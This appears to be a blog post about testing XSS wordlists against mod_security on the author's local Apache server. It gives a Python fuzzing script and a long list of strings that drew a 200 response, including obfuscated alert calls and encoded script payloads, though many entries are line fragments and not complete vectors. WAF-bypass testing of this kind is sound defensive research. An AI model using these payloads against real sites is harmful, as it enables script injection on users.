Mod_security Bypass for XSS

I wanted to do some research in the cybersecurity domain that piqued my interest. I decided to test what XSS strings in the FuzzDB and SecLists lists bypassed mod_security OWASP ruleset on a standard Apache2 web server. I used the code represented below:

#!/usr/bin/env python
"""
Test for mod_security bypass.
"""
# Standard Python libraries.
import requests

with open('/root/projects/fuzzdb.txt') as f:
    content = f.read().splitlines()

dict = {}
for x in content:
    url = 'http://127.0.0.1/login2.php'
    url = url
    payload = {'username': x, 'password': '1'}
    r = requests.post(url, data=payload)
    dict[x] = r.status_code

for k,v in dict.items():
    if v == 200:
        print(k)
        print('----------------------------------------------')

I combined all separate XSS lists within FuzzDB as well as SecLists. I then proceeded to run these on the login parameter of a quick PHP login script I acquired for testing. As you can see from the preceding Python code, I would print out the string that received a 200 response code from the Apache2 server. This shows that the string is not being filtered by the WAF and thus not receiving a 403 Forbidden response from the server.

If there are issues with accessing my Gihub repo below, I have a zipped file with my code, model, and datasets here: Repo Copy

Please see my Github for all code related to this project.

These are the XSS strings that were allowed to pass though the mod_security WAF:

'
----------------------------------------------
"
----------------------------------------------
alert(1)
----------------------------------------------
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
----------------------------------------------
'XSS')>
----------------------------------------------
'); alert('XSS
----------------------------------------------
\";alert('XSS');//
----------------------------------------------
alert
----------------------------------------------
alert(1)
----------------------------------------------
alert(1)
----------------------------------------------
alert\\`1\\`
----------------------------------------------
alert`1`
----------------------------------------------
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
----------------------------------------------
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
----------------------------------------------
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
----------------------------------------------
//%0D%0A%0D%0A//
----------------------------------------------
setTimeout(location.search.slice(1));
----------------------------------------------
\'-alert(1)//
----------------------------------------------
<br><br><br><br><br><br><br><br><br><br>
----------------------------------------------
<br><br><br><br><br><br><x id=x>#x
----------------------------------------------
alert`1`
----------------------------------------------
alert&lpar;1&rpar;
----------------------------------------------
alert&#x28;1&#x29
----------------------------------------------
alert&#40;1&#41
----------------------------------------------
(alert)(1)
----------------------------------------------
a=alert,a(1)
----------------------------------------------
[1].find(alert)
----------------------------------------------
top["al"+"ert"](1)
----------------------------------------------
top[/al/.source+/ert/.source](1)
----------------------------------------------
al\u0065rt(1)
----------------------------------------------
top['al\145rt'](1)
----------------------------------------------
top['al\x65rt'](1)
----------------------------------------------
top[8680439..toString(30)](1)
----------------------------------------------
navigator.vibrate(500)
----------------------------------------------
# credit to rsnake
----------------------------------------------
\";alert('XSS');//
----------------------------------------------
>>> vectors()
----------------------------------------------
<head>
----------------------------------------------
@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}
----------------------------------------------
</head>
----------------------------------------------
<body>Hello</body>
----------------------------------------------
 onerror CDATA "alert(67)"
----------------------------------------------
 onload CDATA "alert(2)">
----------------------------------------------
<div id="91">[A]
----------------------------------------------
[B]
----------------------------------------------
[C]
----------------------------------------------
[D]
----------------------------------------------
<feImage>
----------------------------------------------
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>
----------------------------------------------
</feImage>
----------------------------------------------
*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */
----------------------------------------------
*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */
----------------------------------------------
<a id="x"><rect fill="white" width="1000" height="1000"/></a>
----------------------------------------------
<div id="113"><div id="x">XXX</div>
----------------------------------------------
#x{font-family:foo[bar;color:green;}
----------------------------------------------
#y];color:red;{}
----------------------------------------------
<div id="116"><div id="x">x</div>
----------------------------------------------
<xml:namespace prefix="t">
----------------------------------------------
<div id="117"><a href="http://attacker.org">
----------------------------------------------
    <h1>Drop me</h1>
----------------------------------------------
</div>
----------------------------------------------
function makePopups(){
----------------------------------------------
    for (i=1;i<6;i++) {
----------------------------------------------
        window.open('popup.html','spam'+i,'width=50,height=50');
----------------------------------------------
    }
----------------------------------------------
}
----------------------------------------------
<body>
----------------------------------------------
</body>
----------------------------------------------
<div id="123"><span class=foo>Some text</span>
----------------------------------------------
<a class=bar href="http://www.example.org">www.example.org</a>
----------------------------------------------
alert('foo');
----------------------------------------------
});
----------------------------------------------
alert('bar');
----------------------------------------------
<!ATTLIST xsl:stylesheet
----------------------------------------------
  id    ID    #REQUIRED>]>
----------------------------------------------
        </xsl:template>
----------------------------------------------
    <circle fill="red" r="40"></circle>
----------------------------------------------
Same effect with
----------------------------------------------
<math>
----------------------------------------------
<div id="131"><b>drag and drop one of the following strings to the drop box:</b>
----------------------------------------------
<br/><hr/>
----------------------------------------------
<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>
----------------------------------------------
<br>
----------------------------------------------
<input name="secret" type="password">
----------------------------------------------
</image>
----------------------------------------------
<div id="134"><xmp>
----------------------------------------------
<%
----------------------------------------------
</xmp>
----------------------------------------------
x='<%'
----------------------------------------------
alert(2)
----------------------------------------------
XXX
----------------------------------------------
<eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval>
----------------------------------------------
<if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if>
----------------------------------------------
</template>
----------------------------------------------
<input name="username" value="admin" />
----------------------------------------------
<input name="password" type="password" value="secret" />
----------------------------------------------
<input name="injected" value="injected" dirname="password" />
----------------------------------------------
<input type="submit">
----------------------------------------------
<circle r="400"></circle>
----------------------------------------------